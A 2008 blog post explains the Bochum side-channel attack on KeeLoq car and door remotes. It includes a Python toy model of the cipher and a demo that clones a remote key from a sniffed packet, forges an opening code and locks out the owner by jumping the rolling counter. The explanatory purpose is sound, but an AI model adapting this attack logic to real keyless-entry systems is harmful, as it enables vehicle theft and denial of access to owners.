March 31, 2008
Researchers from the Ruhr-University Bochum found a way to unlock commonly used remote keyless entry (RKE) anti-theft devices and door openers. The product they successfully attacked is called KeeLoq, which is used by the car manufacturers Chrysler, Daewoo, Fiat, General Motors, Honda, Toyota (Lexus), Volvo, Volkswagen and Jaguar. According to Prof. Christof Paar, it is possible to sniff the communication from as far as 100 meters.
A bit more on the technique used for this attack: the sender and receiver protect their communication with a proprietary non-linear block cipher, which encrypts each control command with a one-time rolling code. A 32-bit IV and a 32-bit hopping code are used in conjunction with a unique key for every remote control. But there is a problem: there also exists a master key (the manufacturer key) shared by all remotes of a given series, from which the individual remote keys are derived. This master key was the attack vector used by the Bochum group. They recovered it with side-channel analysis of the hardware, namely differential power analysis (DPA) and differential electromagnetic analysis (DEMA). Once the master key is known, intercepting only two messages is enough to calculate the secret key of a particular remote control. According to the researchers, they tested the attack on commercially available devices. You can read more about it here.
Besides gaining unauthorized access, it is also possible to manipulate the system so that the authorized user can no longer access the car or building: a receiver only accepts codes ahead of its stored rolling-code counter, so an attacker holding the cloned key can push that counter far past the legitimate remote's. Even better!
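To make the two attack outcomes concrete, here is a small Python model of a KeeLoq-style rolling-code system. This is an added example written for this post, not code from the Bochum researchers or from Microchip. The cipher core follows the public KeeLoq description (32-bit block, 64-bit key, 528 NLFSR rounds, non-linear function table 0x3A5C742E); everything else is an assumption for the sake of illustration: the packet layout, the way the remote's key is derived from its serial number and the manufacturer key, the 16-code open window and the two-consecutive-codes resync rule of the receiver, and the manufacturer key value itself, which stands in for what the side-channel analysis would recover. Because this toy derives the remote key from the serial number alone, a single sniffed transmission suffices to clone here; the real schemes differ in detail, which is why the post speaks of two messages.

```python
"""Toy KeeLoq-style rolling-code system and the attack once the master key leaks.

Added example for this post, not the researchers' or Microchip's code. The cipher
core is the public KeeLoq algorithm; packet format, key derivation and receiver
window logic are simplified assumptions.
"""

NLF = 0x3A5C742E        # KeeLoq non-linear function: a 32-entry boolean table
ROUNDS = 528
MASK32 = 0xFFFFFFFF
OPEN_WINDOW = 16        # assumed: counters this far ahead are accepted directly
RESYNC_WINDOW = 32768   # assumed: two consecutive codes this far ahead resync


def _bit(x, n):
    return (x >> n) & 1


def _nlf(x, a, b, c, d, e):
    idx = (_bit(x, a) | _bit(x, b) << 1 | _bit(x, c) << 2
           | _bit(x, d) << 3 | _bit(x, e) << 4)
    return _bit(NLF, idx)


def keeloq_encrypt(block, key):
    x = block & MASK32
    for r in range(ROUNDS):
        fb = _bit(x, 0) ^ _bit(x, 16) ^ _bit(key, r & 63) ^ _nlf(x, 1, 9, 20, 26, 31)
        x = (x >> 1) | (fb << 31)
    return x


def keeloq_decrypt(block, key):
    x = block & MASK32
    for r in range(ROUNDS):
        fb = _bit(x, 31) ^ _bit(x, 15) ^ _bit(key, (15 - r) & 63) ^ _nlf(x, 0, 8, 19, 25, 30)
        x = ((x << 1) & MASK32) | fb
    return x


def derive_device_key(serial, manufacturer_key):
    # Assumed derivation: the remote's 64-bit key is a function of its public
    # serial number and the shared manufacturer key. That dependency is exactly
    # what makes the leaked master key so damaging.
    hi = keeloq_decrypt(0x60000000 | (serial & 0x0FFFFFFF), manufacturer_key)
    lo = keeloq_decrypt(0x20000000 | (serial & 0x0FFFFFFF), manufacturer_key)
    return (hi << 32) | lo


def build_packet(serial, button, counter, device_key):
    # Clear part: serial and button. Hopping part: button, 12 discrimination bits
    # (low serial bits) and the 16-bit counter, encrypted under the device key.
    plain = (button << 28) | ((serial & 0xFFF) << 16) | (counter & 0xFFFF)
    return {"serial": serial, "button": button, "hop": keeloq_encrypt(plain, device_key)}


class Receiver:
    def __init__(self, manufacturer_key, serial, counter):
        self.key = derive_device_key(serial, manufacturer_key)
        self.serial = serial
        self.counter = counter
        self.pending = None  # first code of a would-be resync pair

    def accept(self, pkt):
        plain = keeloq_decrypt(pkt["hop"], self.key)
        if pkt["serial"] != self.serial or (plain >> 16) & 0xFFF != (self.serial & 0xFFF):
            return False
        ctr = plain & 0xFFFF
        delta = (ctr - self.counter) & 0xFFFF
        if 0 < delta <= OPEN_WINDOW:
            self.counter, self.pending = ctr, None
            return True
        if delta < RESYNC_WINDOW:
            if self.pending is not None and ctr == ((self.pending + 1) & 0xFFFF):
                self.counter, self.pending = ctr, None
                return True
            self.pending = ctr
        return False


def attack_demo():
    mk = 0x0123456789ABCDEF   # assumed manufacturer key, stands in for the DPA result
    serial, button = 0x0ABCDEF, 0x2
    owner_key = derive_device_key(serial, mk)
    receiver = Receiver(mk, serial, counter=100)
    # The attacker sniffs one legitimate button press (constructed sample).
    sniffed = build_packet(serial, button, 101, owner_key)
    if not receiver.accept(sniffed):
        raise RuntimeError("legitimate press rejected")
    cloned_key = derive_device_key(sniffed["serial"], mk)
    ctr = keeloq_decrypt(sniffed["hop"], cloned_key) & 0xFFFF
    # 1. Unauthorized access: forge the next valid code with the cloned key.
    opened = receiver.accept(build_packet(serial, button, ctr + 1, cloned_key))
    # 2. Lock-out: two consecutive codes far ahead make the receiver resync,
    #    after which the owner's remote is behind the counter and rejected.
    receiver.accept(build_packet(serial, button, ctr + 5000, cloned_key))
    jumped = receiver.accept(build_packet(serial, button, ctr + 5001, cloned_key))
    owner_locked_out = not receiver.accept(build_packet(serial, button, 102, owner_key))
    return opened, jumped, owner_locked_out


if __name__ == "__main__":
    print(attack_demo())
```

Note what the cipher core contributes to the attack: nothing. A standard cipher, keyed the same way from a shared manufacturer key and implemented without side-channel countermeasures, would fall to the same key extraction. The weaknesses are the key hierarchy (one leaked secret compromises a whole product series) and the unprotected implementation; the obscurity of the algorithm only made the problem harder to spot from the outside.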
And again, as I wrote in my post "A perfect high tech murder": stop reinventing the wheel and stop trying to be smart! The guys in the IT industry already learned this the hard way - use standard, documented encryption! You're not smarter than the people who do this for a living and who survived the internet! One positive aspect: I don't have a car from one of the above manufacturers. 😉